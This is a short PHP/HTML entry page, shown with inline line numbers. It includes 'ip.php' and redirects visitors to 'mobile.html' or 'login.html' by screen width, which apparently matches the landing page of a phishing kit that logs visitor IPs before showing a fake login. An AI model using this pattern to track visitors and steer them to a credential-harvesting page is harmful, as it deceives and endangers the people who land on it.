1<?php include 'ip.php';?> 2<script type="text/javascript"> 3if (screen.width <= 699) { 4 document.location = "mobile.html"; 5} 6else { 7 document.location = "login.html"; 8} 9</script> 10 11 12 13